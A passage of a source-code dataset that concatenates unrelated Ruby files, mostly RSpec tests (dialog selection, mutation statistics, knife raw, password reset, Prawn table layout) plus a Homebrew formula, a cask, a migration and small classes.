  # Root attributes drive dialog selection: "<category>/<tag>".
  let(:root_hash) { { 'dialog_input_vm_tags' => "#{cat}/#{tag}" } }
  let(:root_object) { Spec::Support::MiqAeMockObject.new(root_hash) }
  # Mock automate service whose current object is a child of the root object.
  let(:ae_service) do
    Spec::Support::MiqAeMockService.new(root_object).tap do |service|
      current_object = Spec::Support::MiqAeMockObject.new
      current_object.parent = root_object
      service.object = current_object
    end
  end
  it 'sets dialog name in the root object' do
    described_class.new(ae_service).main(true)
    expect(ae_service.root['dialog_name']).to(eq("miq_provision_dialogs-deploy-#{tag}"))
  end
  context 'does not set dialog name' do
    it '#not matching dialog_input_vm_tags attribute' do
      ae_service.root['dialog_input_vm_tags'] = 'not_matching_string'
      described_class.new(ae_service).main(true)
      expect(ae_service.root['dialog_name']).to(eq(nil))
    end
    it '#run_env_dialog flag is false' do
      # main's default (falsey) flag should neither log nor set a dialog name.
      expect(ae_service).not_to(receive(:log))
      described_class.new(ae_service).main
      expect(ae_service.root['dialog_name']).to(eq(nil))
    end
  end
end
| 34.305556 | 88 | 0.693927 |
edd786cce7bdc96e1fd7518d177097debd061749 | 1,387 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe MutatorRails::Statistics do
  let(:object) { described_class.call }
  let(:statistics_file) { 'log/mutant/statistics.txt' }
  # Start from a clean slate so each example proves the file was (re)written.
  before do
    File.delete(statistics_file) if File.exist?(statistics_file)
  end
  describe '#call' do
    # NOTE(review): the `match` matcher compiles a String argument into a
    # Regexp, so '(', ')', '.' and '%' below act as pattern metacharacters —
    # consider `include` or `eq` if a literal comparison is intended.
    let(:expectations) do
      "
2 module(s) were mutated in 2 minutes 7 seconds
for a total of 198 mutations tested @ 1.56/sec average
which left 52 mutations alive (26.3%)
and 146 killed (73.7%)
0 module(s) were fully mutated (0.0%)
The following modules remain with failures (check log):
  . Export::ActivityExporter
The following modules fell back to non-parallel(-j1):
  . Export::ActivityExporter2
The following modules had most alive mutations (top 10):
  . Export::ActivityExporter (26)
  . Export::ActivityExporter2 (26)
The following modules had longest mutation time (top 10):
  . Export::ActivityExporter (1 minute 3 seconds)
  . Export::ActivityExporter2 (1 minute 3 seconds)
The following modules had largest mutation count (top 10):
  . Export::ActivityExporter (99)
  . Export::ActivityExporter2 (99)"
    end
    it 'processes the log files' do
      object
      expect(File.exist?(statistics_file)).to be true
    end
    it 'has the proper stats' do
      object
      stats = File.read(statistics_file)
      expect(stats).to match(expectations)
    end
  end
end
| 25.218182 | 64 | 0.720981 |
03a6d2f502cca3c4fb8d2d7eee22f574a49b579d | 548 | require "utils/commands/add_path_command"
require "plugins/plugin_command_spec"
describe AddPath do
  let(:test_path) { "test path" }
  subject { AddPath.new(test_path) }
  it_behaves_like "a plugin command"
  describe "#do" do
    # Stub out the shell call so no real command is executed.
    before do
      allow(subject).to receive(:system)
    end
    it "SHOULD add correct path export to bash_profile" do
      subject.do
      expect(subject).to have_received(:system).with("echo 'export PATH=#{test_path}:$PATH' >> ~/.bash_profile")
    end
  end
end
| 23.826087 | 118 | 0.638686 |
26bcc8aba719e14e79672a6cfdcafd7810341c2f | 43 | module CelViewTool
VERSION = "0.1.0"
end
| 10.75 | 19 | 0.697674 |
b9c6b5e70a0f6da321d31241e5d11f569278e3d3 | 1,657 | class Pulumi < Formula
desc "Cloud native development platform"
homepage "https://pulumi.io/"
url "https://github.com/pulumi/pulumi.git",
:tag => "v1.14.0",
:revision => "ee675011512b6f847eeb45685f8873db89e09d10"
bottle do
cellar :any_skip_relocation
sha256 "f8a22bc2dd23579a32359926cb63db6dd4ee313683cc6d56234740da76fec465" => :catalina
sha256 "3ecaf0853980d7d53f43997d36da42020f8f28fdeac12c921c7a9cc52ab661db" => :mojave
sha256 "4c93c36683f2fe1daedc37fe41ab93cf19fd42e1c4edb32159a277dc84601073" => :high_sierra
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
ENV["GO111MODULE"] = "on"
dir = buildpath/"src/github.com/pulumi/pulumi"
dir.install buildpath.children
cd dir do
cd "./sdk" do
system "go", "mod", "download"
end
cd "./pkg" do
system "go", "mod", "download"
end
system "make", "dist"
bin.install Dir["#{buildpath}/bin/*"]
prefix.install_metafiles
# Install bash completion
output = Utils.popen_read("#{bin}/pulumi gen-completion bash")
(bash_completion/"pulumi").write output
# Install zsh completion
output = Utils.popen_read("#{bin}/pulumi gen-completion zsh")
(zsh_completion/"_pulumi").write output
end
end
test do
ENV["PULUMI_ACCESS_TOKEN"] = "local://"
ENV["PULUMI_TEMPLATE_PATH"] = testpath/"templates"
system "#{bin}/pulumi", "new", "aws-typescript", "--generate-only",
"--force", "-y"
assert_predicate testpath/"Pulumi.yaml", :exist?, "Project was not created"
end
end
| 31.264151 | 93 | 0.648159 |
1d2137814d8e655078651e239367cdc3d7ed841b | 106 | require "httparty"
# Thin HTTParty wrapper; subclasses inherit the gorest.co.in public API
# base URI and HTTParty's request methods.
class BaseService
  include HTTParty
  base_uri "https://gorest.co.in/public-api"
end
| 15.142857 | 44 | 0.764151 |
bfb2312f498d14e439c5dd2e57da4aeff427dfbb | 314 | # app.rb
require 'rubygems'
require 'sinatra/base'
require 'rack'
require 'yaml'
require 'erb'
# Minimal Sinatra app: renders any ERB view by name.
class TestApp < Sinatra::Base
  set :root, File.dirname(__FILE__)
  # Serve static files (from Sinatra's default public folder under root).
  set :static, true
  # GET /<view> renders views/<view>.erb.
  get '/:view' do |view|
    erb view.to_sym
  end
end
# Start a standalone Mongrel server only when executed directly.
if __FILE__ == $0
  Rack::Handler::Mongrel.run TestApp, :Port => 8070
end
| 14.952381 | 51 | 0.681529 |
6254017615b8bf65177d72aef6a2540154539f89 | 2,168 | class RemoveDotAtomPathEndingOfProjects < ActiveRecord::Migration[4.2]
include Gitlab::ShellAdapter
class ProjectPath
attr_reader :old_path, :id, :namespace_path
def initialize(old_path, id, namespace_path, namespace_id)
@old_path = old_path
@id = id
@namespace_path = namespace_path
@namespace_id = namespace_id
end
def clean_path
@_clean_path ||= PathCleaner.clean(@old_path, @namespace_id)
end
end
class PathCleaner
def initialize(path, namespace_id)
@namespace_id = namespace_id
@path = path
end
def self.clean(*args)
new(*args).clean
end
def clean
path = cleaned_path
count = 0
while path_exists?(path)
path = "#{cleaned_path}#{count}"
count += 1
end
path
end
private
def cleaned_path
@_cleaned_path ||= @path.gsub(/\.atom\z/, '-atom')
end
def path_exists?(path)
Project.find_by_path_and_namespace_id(path, @namespace_id)
end
end
def projects_with_dot_atom
select_all("SELECT p.id, p.path, n.path as namespace_path, n.id as namespace_id FROM projects p inner join namespaces n on n.id = p.namespace_id WHERE p.path LIKE '%.atom'")
end
def up
projects_with_dot_atom.each do |project|
project_path = ProjectPath.new(project['path'], project['id'], project['namespace_path'], project['namespace_id'])
clean_path(project_path) if rename_project_repo(project_path)
end
end
private
def clean_path(project_path)
execute "UPDATE projects SET path = #{sanitize(project_path.clean_path)} WHERE id = #{project_path.id}"
end
def rename_project_repo(project_path)
old_path_with_namespace = File.join(project_path.namespace_path, project_path.old_path)
new_path_with_namespace = File.join(project_path.namespace_path, project_path.clean_path)
gitlab_shell.mv_repository("#{old_path_with_namespace}.wiki", "#{new_path_with_namespace}.wiki")
gitlab_shell.mv_repository(old_path_with_namespace, new_path_with_namespace)
rescue
false
end
def sanitize(value)
ActiveRecord::Base.connection.quote(value)
end
end
| 26.765432 | 177 | 0.704797 |
ff068e9b287f58cadf6674cdea585adeed505e28 | 926 | require 'spec_helper'
describe 'postfix::augeas' do
  # Facts mimicking a Debian wheezy node with the augeas lens support needed.
  let (:facts) { {
    :augeasversion => '1.2.0',
    :lsbdistcodename => 'wheezy',
    :operatingsystem => 'Debian',
    :osfamily => 'Debian',
    :rubyversion => '1.9.3',
    :path => '/foo/bar',
  } }
  let :pre_condition do
    "include ::augeas"
  end
  it { is_expected.to contain_augeas__lens('postfix_transport').with(
    :ensure      => 'present',
    :lens_source => 'puppet:///modules/postfix/lenses/postfix_transport.aug',
    :test_source => 'puppet:///modules/postfix/lenses/test_postfix_transport.aug',
    :stock_since => '1.0.0'
  ) }
  it { is_expected.to contain_augeas__lens('postfix_virtual').with(
    :ensure      => 'present',
    :lens_source => 'puppet:///modules/postfix/lenses/postfix_virtual.aug',
    :test_source => 'puppet:///modules/postfix/lenses/test_postfix_virtual.aug',
    :stock_since => '1.0.0'
  ) }
end
| 31.931034 | 82 | 0.62635 |
d5a8b690b9e56b6b0f7c8c83e10206bc4fb3c51a | 201 | module ImagesHelper
# called in goals show page to display latest image
def view_latest_image
if @goal.images.any?
image_tag(@goal.images.last.url)
end
end
end | 20.1 | 55 | 0.641791 |
080ea0f21bc386be0c5d5f41178fd374bf017109 | 5,295 | #
# Author:: John Keiser (<[email protected]>)
# Copyright:: Copyright (c) 2013 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'support/shared/integration/integration_helper'
require 'support/shared/context/config'
require 'chef/knife/raw'
require 'chef/knife/show'
# Integration specs for `knife raw`, which issues raw HTTP requests against
# the Chef server and prints the (optionally prettified) response body.
describe 'knife raw' do
  include IntegrationSupport
  include KnifeSupport
  include AppServerSupport
  include_context "default config options"

  when_the_chef_server "has one of each thing" do
    before do
      # Seed the in-memory server with one object of every type.
      client 'x', '{}'
      cookbook 'x', '1.0.0'
      data_bag 'x', { 'y' => '{}' }
      environment 'x', '{}'
      node 'x', '{}'
      role 'x', '{}'
      user 'x', '{}'
    end

    # GET of an existing object: output is the server's prettified JSON.
    it 'knife raw /nodes/x returns the node', :pending => (RUBY_VERSION < "1.9") do
      knife('raw /nodes/x').should_succeed <<EOM
{
  "name": "x",
  "json_class": "Chef::Node",
  "chef_type": "node",
  "chef_environment": "_default",
  "override": {
  },
  "normal": {
  },
  "default": {
  },
  "automatic": {
  },
  "run_list": [
  ]
}
EOM
    end

    it 'knife raw /blarghle returns 404' do
      knife('raw /blarghle').should_fail(/ERROR: Server responded with error 404 "Not Found\s*"/)
    end

    # DELETE prints the deleted object; a follow-up `knife show` proves it
    # is really gone.
    it 'knife raw -m DELETE /roles/x succeeds', :pending => (RUBY_VERSION < "1.9") do
      knife('raw -m DELETE /roles/x').should_succeed <<EOM
{
  "name": "x",
  "description": "",
  "json_class": "Chef::Role",
  "chef_type": "role",
  "default_attributes": {
  },
  "override_attributes": {
  },
  "run_list": [
  ],
  "env_run_lists": {
  }
}
EOM
      knife('show /roles/x.json').should_fail "ERROR: /roles/x.json: No such file or directory\n"
    end

    # PUT with `-i <file>` sends the file body; the updated role is then
    # visible via `knife show`.
    it 'knife raw -m PUT -i blah.txt /roles/x succeeds', :pending => (RUBY_VERSION < "1.9") do
      Tempfile.open('raw_put_input') do |file|
        file.write <<EOM
{
  "name": "x",
  "description": "eek",
  "json_class": "Chef::Role",
  "chef_type": "role",
  "default_attributes": {
  },
  "override_attributes": {
  },
  "run_list": [
  ],
  "env_run_lists": {
  }
}
EOM
        file.close

        knife("raw -m PUT -i #{file.path} /roles/x").should_succeed <<EOM
{
  "name": "x",
  "description": "eek",
  "json_class": "Chef::Role",
  "chef_type": "role",
  "default_attributes": {
  },
  "override_attributes": {
  },
  "run_list": [
  ],
  "env_run_lists": {
  }
}
EOM
        knife('show /roles/x.json').should_succeed <<EOM
/roles/x.json:
{
  "name": "x",
  "description": "eek"
}
EOM
      end
    end

    # POST creates a new role and prints the URI of the created resource.
    it 'knife raw -m POST -i blah.txt /roles succeeds', :pending => (RUBY_VERSION < "1.9") do
      Tempfile.open('raw_put_input') do |file|
        file.write <<EOM
{
  "name": "y",
  "description": "eek",
  "json_class": "Chef::Role",
  "chef_type": "role",
  "default_attributes": {
  },
  "override_attributes": {
  },
  "run_list": [
  ],
  "env_run_lists": {
  }
}
EOM
        file.close

        knife("raw -m POST -i #{file.path} /roles").should_succeed <<EOM
{
  "uri": "#{ChefZeroSupport::Server.server.url}/roles/y"
}
EOM
        knife('show /roles/y.json').should_succeed <<EOM
/roles/y.json:
{
  "name": "y",
  "description": "eek"
}
EOM
      end
    end

    # Stand up a minimal Rack app on port 9018 so knife talks to something
    # that is not a real Chef server; checks JSON prettification behavior.
    context 'When a server returns raw json' do
      before :each do
        Chef::Config.chef_server_url = "http://localhost:9018"
        app = lambda do |env|
          [200, {'Content-Type' => 'application/json' }, ['{ "x": "y", "a": "b" }'] ]
        end
        @raw_server, @raw_server_thread = start_app_server(app, 9018)
      end

      after :each do
        @raw_server.shutdown if @raw_server
        @raw_server_thread.kill if @raw_server_thread
      end

      it 'knife raw /blah returns the prettified json', :pending => (RUBY_VERSION < "1.9") do
        knife('raw /blah').should_succeed <<EOM
{
  "x": "y",
  "a": "b"
}
EOM
      end

      it 'knife raw --no-pretty /blah returns the raw json' do
        knife('raw --no-pretty /blah').should_succeed <<EOM
{ "x": "y", "a": "b" }
EOM
      end
    end

    # Non-JSON content types must never be prettified, with or without
    # --no-pretty.
    context 'When a server returns text' do
      before :each do
        Chef::Config.chef_server_url = "http://localhost:9018"
        app = lambda do |env|
          [200, {'Content-Type' => 'text' }, ['{ "x": "y", "a": "b" }'] ]
        end
        @raw_server, @raw_server_thread = start_app_server(app, 9018)
      end

      after :each do
        @raw_server.shutdown if @raw_server
        @raw_server_thread.kill if @raw_server_thread
      end

      it 'knife raw /blah returns the raw text' do
        knife('raw /blah').should_succeed(<<EOM)
{ "x": "y", "a": "b" }
EOM
      end

      it 'knife raw --no-pretty /blah returns the raw text' do
        knife('raw --no-pretty /blah').should_succeed(<<EOM)
{ "x": "y", "a": "b" }
EOM
      end
    end
  end
end
| 21.790123 | 97 | 0.594145 |
01a51d31084425d0ac745ed5aca376f591c0eab1 | 750 | cask 'terminus' do
version '1.0.82'
sha256 '2e00b814031e1bef2ced9aa49c4ed87c3fee21545a038259553dbd34f48c98af'
# github.com/Eugeny/terminus was verified as official when first introduced to the cask
url "https://github.com/Eugeny/terminus/releases/download/v#{version}/terminus-#{version}-macos.dmg"
appcast 'https://github.com/Eugeny/terminus/releases.atom'
name 'Terminus'
homepage 'https://eugeny.github.io/terminus/'
app 'Terminus.app'
zap trash: [
'~/Library/Application Support/terminus',
'~/Library/Preferences/org.terminus.helper.plist',
'~/Library/Preferences/org.terminus.plist',
'~/Library/Saved Application State/org.terminus.savedState',
]
end
| 37.5 | 102 | 0.693333 |
08daf6d0ff91e1a88c0330f1c2120cd6e7d10052 | 1,839 | # Copyright © 2011-2020 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# IRB approval record attached to a protocol's human-subjects information.
class IrbRecord < ApplicationRecord
  include RemotelyNotifiable

  belongs_to :human_subjects_info
  has_one :protocol, through: :human_subjects_info
  has_and_belongs_to_many :study_phases

  validates :pro_number, presence: true

  # Phase names of every associated study phase.
  def study_phase_values
    study_phases.pluck(:phase)
  end
end
| 51.083333 | 145 | 0.805329 |
e96196b6a25db812f9934761cb7defe2b3d3756d | 4,359 | require "test_helper"
require "support/password_helpers"
class PasswordResetTest < ActionDispatch::IntegrationTest
include PasswordHelpers
include ActiveJob::TestHelper
BLANKET_RESET_MESSAGE = "If your email address is recognised, you’ll receive an email with instructions about how to reset your password.".freeze
should "email password reset instructions and allow the user to set a new one" do
perform_enqueued_jobs do
user = create(:user)
new_password = "some v3ry s3cure password"
trigger_reset_for(user.email)
assert_response_contains(BLANKET_RESET_MESSAGE)
open_email(user.email)
assert current_email
assert_equal "Reset password instructions", current_email.subject
complete_password_reset(current_email, new_password: new_password)
assert_response_contains("Your password was changed successfully")
user.reload
assert user.valid_password?(new_password)
end
end
should "not allow password reset for unaccepted invitations" do
perform_enqueued_jobs do
user = create(:user, invitation_sent_at: Time.zone.now, invitation_accepted_at: nil)
trigger_reset_for(user.email)
assert_response_contains(BLANKET_RESET_MESSAGE)
open_email(user.email)
assert current_email
assert_equal "Your GOV.UK Signon development account has not been activated", current_email.subject
end
end
should "not allow password reset for suspended users" do
perform_enqueued_jobs do
user = create(:suspended_user)
trigger_reset_for(user.email)
assert_response_contains(BLANKET_RESET_MESSAGE)
open_email(user.email)
assert current_email
assert_equal "Your GOV.UK Signon development account has been suspended", current_email.subject
end
end
should "not give away whether an email exists in the system or not" do
trigger_reset_for("[email protected]")
assert_not page.has_content?("Email not found"), page.body
assert_response_contains(BLANKET_RESET_MESSAGE)
end
should "not allow a reset link to be used more than once" do
perform_enqueued_jobs do
user = create(:user)
new_password = "some v3ry s3cure password"
trigger_reset_for(user.email)
open_email(user.email)
assert current_email
assert_equal "Reset password instructions", current_email.subject
complete_password_reset(current_email, new_password: new_password)
assert_response_contains("Your password was changed successfully")
signout
current_email.find_link(href: false).click
assert_response_contains("Sorry, this link doesn't work")
end
end
should "not be broken by virus-scanners that follow links in emails" do
# Some users have virus-scanning systems that follow links in emails to
# check for anything malicious. This was breaking this flow because the
# token was being reset the first time the page was accessed (introduced in
# a044b79).
perform_enqueued_jobs do
user = create(:user)
new_password = "some v3ry s3cure password"
trigger_reset_for(user.email)
open_email(user.email)
assert current_email
assert_equal "Reset password instructions", current_email.subject
# simulate something following the link in the email.
current_email.find_link(href: false).click
complete_password_reset(current_email, new_password: new_password)
assert_response_contains("Your password was changed successfully")
end
end
should "show error messages when password reset doesn't work" do
perform_enqueued_jobs do
user = create(:user)
trigger_reset_for(user.email)
open_email(user.email)
current_email.find_link(href: false).click
fill_in "New password", with: "A Password"
fill_in "Confirm new password", with: "Not That Password"
click_button "Save password"
assert_response_contains("Password confirmation doesn't match")
end
end
should "return a 429 response if too many requests are made" do
Rack::Attack.enabled = true
Rack::Attack.cache.store = ActiveSupport::Cache::MemoryStore.new
user = create(:user)
100.times { trigger_reset_for(user.email) }
assert_response_contains("Too many requests.")
Rack::Attack.enabled = false
end
end
| 32.529851 | 147 | 0.738013 |
395a20ba9e3e40a24df6bc9f8be27360a7b797f8 | 440 | require 'json'
# Links a Book to a Person for a given date, registering itself on both
# sides of the association at construction time.
class Rental
  attr_accessor :date, :book, :person

  def initialize(date, book, person)
    @date   = date
    @book   = book
    @person = person

    # Register this rental with both associated records.
    book.rentals << self
    person.rentals << self
  end

  def to_s
    format('Date: %s, Book "%s" by %s', @date, book.title, book.author)
  end

  # NOTE(review): despite the name this returns a Hash (whose nested records
  # are already serialized via their own #to_json), not a JSON string —
  # confirm callers expect that before changing it.
  def to_json(_options = {})
    {
      'date' => @date,
      'book' => @book.to_json,
      'person' => @person.to_json
    }
  end
end
| 16.296296 | 62 | 0.563636 |
28a817e1d582b8e57039ca94eb90c601a61e744d | 389 | # require FinancialAssistance::Engine.root.join('app', 'domain', 'types.rb')
FinancialAssistanceRegistry = ResourceRegistry::Registry.new
FinancialAssistanceRegistry.configure do |config|
config.name = :enroll
config.created_at = DateTime.now
config.load_path = "#{Rails.root.to_s.gsub('/components/financial_assistance/spec/dummy', '')}/system/config/templates/features"
end | 43.222222 | 130 | 0.771208 |
334a9aa5ab906f8fbaae859a370e73ad0b1ecc65 | 34,152 | # encoding: utf-8
require File.join(File.expand_path(File.dirname(__FILE__)), "spec_helper")
require 'set'
describe "Prawn::Table" do
describe "converting data to Cell objects" do
before(:each) do
@pdf = Prawn::Document.new
@table = @pdf.table([%w[R0C0 R0C1], %w[R1C0 R1C1]])
end
it "should return a Prawn::Table" do
@table.should.be.an.instance_of Prawn::Table
end
it "should flatten the data into the @cells array in row-major order" do
@table.cells.map { |c| c.content }.should == %w[R0C0 R0C1 R1C0 R1C1]
end
it "should add row and column numbers to each cell" do
c = @table.cells.to_a.first
c.row.should == 0
c.column.should == 0
end
it "should allow empty fields" do
lambda {
data = [["foo","bar"],["baz",""]]
@pdf.table(data)
}.should.not.raise
end
it "should allow a table with a header but no body" do
lambda { @pdf.table([["Header"]], :header => true) }.should.not.raise
end
it "should accurately count columns from data" do
# First data row may contain colspan which would hide true column count
data = [["Name:", {:content => "Some very long name", :colspan => 5}]]
pdf = Prawn::Document.new
table = Prawn::Table.new data, pdf
table.column_widths.length.should == 6
end
end
describe "#initialize" do
before(:each) do
@pdf = Prawn::Document.new
end
it "should instance_eval a 0-arg block" do
initializer = mock()
initializer.expects(:kick).once
@pdf.table([["a"]]){
self.should.be.an.instance_of(Prawn::Table); initializer.kick }
end
it "should call a 1-arg block with the document as the argument" do
initializer = mock()
initializer.expects(:kick).once
@pdf.table([["a"]]){ |doc|
doc.should.be.an.instance_of(Prawn::Table); initializer.kick }
end
it "should proxy cell methods to #cells" do
table = @pdf.table([["a"]], :cell_style => { :padding => 11 })
table.cells[0, 0].padding.should == [11, 11, 11, 11]
end
it "should set row and column length" do
table = @pdf.table([["a", "b", "c"], ["d", "e", "f"]])
table.row_length.should == 2
table.column_length.should == 3
end
it "should generate a text cell based on a String" do
t = @pdf.table([["foo"]])
t.cells[0,0].should.be.a.kind_of(Prawn::Table::Cell::Text)
end
it "should pass through a text cell" do
c = Prawn::Table::Cell::Text.new(@pdf, [0,0], :content => "foo")
t = @pdf.table([[c]])
t.cells[0,0].should == c
end
end
describe "cell accessors" do
before(:each) do
@pdf = Prawn::Document.new
@table = @pdf.table([%w[R0C0 R0C1], %w[R1C0 R1C1]])
end
it "should select rows by number or range" do
Set.new(@table.row(0).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1])
Set.new(@table.rows(0..1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should select rows by array" do
Set.new(@table.rows([0, 1]).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should allow negative row selectors" do
Set.new(@table.row(-1).map { |c| c.content }).should ==
Set.new(%w[R1C0 R1C1])
Set.new(@table.rows(-2..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
Set.new(@table.rows(0..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should select columns by number or range" do
Set.new(@table.column(0).map { |c| c.content }).should ==
Set.new(%w[R0C0 R1C0])
Set.new(@table.columns(0..1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should select columns by array" do
Set.new(@table.columns([0, 1]).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should allow negative column selectors" do
Set.new(@table.column(-1).map { |c| c.content }).should ==
Set.new(%w[R0C1 R1C1])
Set.new(@table.columns(-2..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
Set.new(@table.columns(0..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should allow rows and columns to be combined" do
@table.row(0).column(1).map { |c| c.content }.should == ["R0C1"]
end
it "should accept a filter block, returning a cell proxy" do
@table.cells.filter { |c| c.content =~ /R0/ }.column(1).map{ |c|
c.content }.should == ["R0C1"]
end
it "should accept the [] method, returning a Cell or nil" do
@table.cells[0, 0].content.should == "R0C0"
@table.cells[12, 12].should.be.nil
end
it "should proxy unknown methods to the cells" do
@table.cells.height = 200
@table.row(1).height = 100
@table.cells[0, 0].height.should == 200
@table.cells[1, 0].height.should == 100
end
it "should ignore non-setter methods" do
lambda {
@table.cells.content_width
}.should.raise(NoMethodError)
end
it "should accept the style method, proxying its calls to the cells" do
@table.cells.style(:height => 200, :width => 200)
@table.column(0).style(:width => 100)
@table.cells[0, 1].width.should == 200
@table.cells[1, 0].height.should == 200
@table.cells[1, 0].width.should == 100
end
it "style method should accept a block, passing each cell to be styled" do
@table.cells.style { |c| c.height = 200 }
@table.cells[0, 1].height.should == 200
end
it "should return the width of selected columns for #width" do
c0_width = @table.column(0).map{ |c| c.width }.max
c1_width = @table.column(1).map{ |c| c.width }.max
@table.column(0).width.should == c0_width
@table.column(1).width.should == c1_width
@table.columns(0..1).width.should == c0_width + c1_width
@table.cells.width.should == c0_width + c1_width
end
it "should return the height of selected rows for #height" do
r0_height = @table.row(0).map{ |c| c.height }.max
r1_height = @table.row(1).map{ |c| c.height }.max
@table.row(0).height.should == r0_height
@table.row(1).height.should == r1_height
@table.rows(0..1).height.should == r0_height + r1_height
@table.cells.height.should == r0_height + r1_height
end
end
describe "layout" do
before(:each) do
@pdf = Prawn::Document.new
@long_text = "The quick brown fox jumped over the lazy dogs. " * 5
end
describe "width" do
it "should raise an error if the given width is outside of range" do
lambda do
@pdf.table([["foo"]], :width => 1)
end.should.raise(Prawn::Errors::CannotFit)
lambda do
@pdf.table([[@long_text]], :width => @pdf.bounds.width + 100)
end.should.raise(Prawn::Errors::CannotFit)
end
it "should accept the natural width for small tables" do
pad = 10 # default padding
@table = @pdf.table([["a"]])
@table.width.should == @table.cells[0, 0].natural_content_width + pad
end
it "width should equal sum(column_widths)" do
table = Prawn::Table.new([%w[ a b c ], %w[d e f]], @pdf) do
column(0).width = 50
column(1).width = 100
column(2).width = 150
end
table.width.should == 300
end
it "should accept Numeric for column_widths" do
table = Prawn::Table.new([%w[ a b c ], %w[d e f]], @pdf) do |t|
t.column_widths = 50
end
table.width.should == 150
end
it "should calculate unspecified column widths as "+
"(max(string_width) + 2*horizontal_padding)" do
hpad, fs = 3, 12
columns = 2
table = Prawn::Table.new( [%w[ foo b ], %w[d foobar]], @pdf,
:cell_style => { :padding => hpad, :size => fs } )
col0_width = @pdf.width_of("foo", :size => fs)
col1_width = @pdf.width_of("foobar", :size => fs)
table.width.should == col0_width + col1_width + 2*columns*hpad
end
it "should allow mixing autocalculated and preset"+
"column widths within a single table" do
hpad, fs = 10, 6
stretchy_columns = 2
col0_width = 50
col1_width = @pdf.width_of("foo", :size => fs)
col2_width = @pdf.width_of("foobar", :size => fs)
col3_width = 150
table = Prawn::Table.new( [%w[snake foo b apple],
%w[kitten d foobar banana]], @pdf,
:cell_style => { :padding => hpad, :size => fs }) do
column(0).width = col0_width
column(3).width = col3_width
end
table.width.should == col1_width + col2_width +
2*stretchy_columns*hpad +
col0_width + col3_width
end
it "should preserve all manually requested column widths" do
col0_width = 50
col1_width = 20
col3_width = 60
table = Prawn::Table.new( [["snake", "foo", "b",
"some long, long text that will wrap"],
%w[kitten d foobar banana]], @pdf,
:width => 150) do
column(0).width = col0_width
column(1).width = col1_width
column(3).width = col3_width
end
table.draw
table.column(0).width.should == col0_width
table.column(1).width.should == col1_width
table.column(3).width.should == col3_width
end
it "should not exceed the maximum width of the margin_box" do
expected_width = @pdf.margin_box.width
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf)
table.width.should == expected_width
end
it "should not exceed the maximum width of the margin_box even with" +
"manual widths specified" do
expected_width = @pdf.margin_box.width
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf) { column(1).width = 100 }
table.width.should == expected_width
end
it "scales down only the non-preset column widths when the natural width" +
"exceeds the maximum width of the margin_box" do
expected_width = @pdf.margin_box.width
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf) { column(1).width = 100; column(3).width = 50 }
table.width.should == expected_width
table.column_widths[1].should == 100
table.column_widths[3].should == 50
end
it "should allow width to be reset even after it has been calculated" do
@table = @pdf.table([[@long_text]])
@table.width
@table.width = 100
@table.width.should == 100
end
it "should shrink columns evenly when two equal columns compete" do
@table = @pdf.table([["foo", @long_text], [@long_text, "foo"]])
@table.cells[0, 0].width.should == @table.cells[0, 1].width
end
it "should grow columns evenly when equal deficient columns compete" do
@table = @pdf.table([["foo", "foobar"], ["foobar", "foo"]], :width => 500)
@table.cells[0, 0].width.should == @table.cells[0, 1].width
end
it "should respect manual widths" do
@table = @pdf.table([%w[foo bar baz], %w[baz bar foo]], :width => 500) do
column(1).width = 60
end
@table.column(1).width.should == 60
